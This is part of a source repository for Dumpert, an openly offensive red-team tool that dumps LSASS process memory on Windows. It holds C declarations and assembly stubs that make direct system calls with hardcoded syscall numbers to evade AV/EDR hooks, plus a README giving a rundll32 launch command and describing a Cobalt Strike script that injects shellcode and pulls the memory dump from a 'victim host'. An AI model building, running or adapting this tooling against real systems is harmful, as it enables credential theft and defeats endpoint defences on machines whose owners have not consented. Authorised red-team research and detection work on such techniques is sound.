| EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 99 | 100 | // Windows 8 / Server 2012 specific Syscalls 101 | EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 102 | EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 103 | EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 104 | EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle); 105 | EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 106 | EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 107 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 108 | EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 109 | 110 | 111 | // Windows 8.1 / Server 2012 R2 specific Syscalls 112 | EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 113 | EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 114 | EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 115 | EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle); 116 | EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 117 | EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 118 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 119 | EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 120 | 121 | 122 | // Windows 10 / Server 2016 specific Syscalls 123 | EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 124 | EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 125 | EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 126 | EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle); 127 | EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 128 | EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 129 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 130 | EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 131 | 132 | NTSTATUS(*NtAllocateVirtualMemory)( 133 | HANDLE ProcessHandle, 134 | PVOID *BaseAddress, 135 | ULONG_PTR ZeroBits, 136 | PSIZE_T RegionSize, 137 | ULONG AllocationType, 138 | ULONG Protect 139 | ); 140 | 141 | NTSTATUS(*NtFreeVirtualMemory)( 142 | HANDLE ProcessHandle, 143 | PVOID *BaseAddress, 144 | IN OUT PSIZE_T RegionSize, 145 | ULONG FreeType 146 | ); 147 | 148 | NTSTATUS(*ZwOpenProcess)( 149 | PHANDLE ProcessHandle, 150 | ACCESS_MASK DesiredAccess, 151 | POBJECT_ATTRIBUTES ObjectAttributes, 152 | PCLIENT_ID ClientId 153 | ); 154 | 155 | NTSTATUS(WINAPI *ZwQuerySystemInformation)( 156 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 157 | PVOID SystemInformation, 158 | ULONG SystemInformationLength, 159 | PULONG ReturnLength 160 | ); 161 | 162 | NTSTATUS(*ZwWriteVirtualMemory)( 163 | HANDLE hProcess, 164 | PVOID lpBaseAddress, 165 | PVOID lpBuffer, 166 | SIZE_T NumberOfBytesToRead, 167 | PSIZE_T NumberOfBytesRead 168 | ); 169 | 170 | NTSTATUS(*ZwProtectVirtualMemory)( 171 | IN HANDLE ProcessHandle, 172 | IN PVOID* BaseAddress, 173 | IN SIZE_T* NumberOfBytesToProtect, 174 | IN ULONG NewAccessProtection, 175 | OUT PULONG OldAccessProtection 176 | ); 177 | 178 | NTSTATUS(*NtCreateFile)( 179 | PHANDLE FileHandle, 180 | ACCESS_MASK DesiredAccess, 181 | POBJECT_ATTRIBUTES ObjectAttributes, 182 | PIO_STATUS_BLOCK IoStatusBlock, 183 | PLARGE_INTEGER AllocationSize, 184 | ULONG FileAttributes, 185 | ULONG ShareAccess, 186 | ULONG CreateDisposition, 187 | ULONG CreateOptions, 188 | PVOID EaBuffer, 189 | ULONG EaLength 190 | ); 191 | 192 | NTSTATUS(*ZwClose)( 193 | IN HANDLE KeyHandle 194 | ); 195 | 196 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 197 | LPOSVERSIONINFOEXW lpVersionInformation 198 | ); 199 | 200 | typedef void (WINAPI* _RtlInitUnicodeString)( 201 | PUNICODE_STRING DestinationString, 202 | PCWSTR SourceString 203 | ); 204 | 205 | typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)( 206 | PUNICODE_STRING String1, 207 | PCUNICODE_STRING String2, 208 | BOOLEAN CaseInSensitive 209 | ); 210 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | OutflankDumpert 24 | 8.1 25 | Outflank-Dumpert 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | false 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### Dumpert, an LSASS memory dumper using direct system calls and API unhooking 2 | 3 | Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 4 | This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, 5 | while not touching disk and evading AV/EDR monitored user-mode API calls. 6 | 7 | More info about the used techniques can be found on the following Blog: 8 | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ 9 | 10 | Two versions of the code are included: 11 | 12 | An executable and a DLL version of the code. 13 | The DLL version can be run as follows: 14 | 15 | ``` 16 | rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump 17 | ``` 18 | 19 | Also, an sRDI version of the code is provided, including a Cobalt Strike agressor script. 20 | This script uses shinject to inject the sRDI shellcode version of the dumpert DLL into the current process. 21 | Then it waits a few seconds for the lsass minidump to finish and finally downloads the minidump file from the victim host. 22 | 23 | Compile instructions: 24 | 25 | ``` 26 | This project is written in C and assembly. 27 | You can use Visual Studio to compile it from source. 28 | ``` 29 | 30 | The sRDI code can be found here: https://github.com/monoxgas/sRDI 31 | --------------------------------------------------------------------------------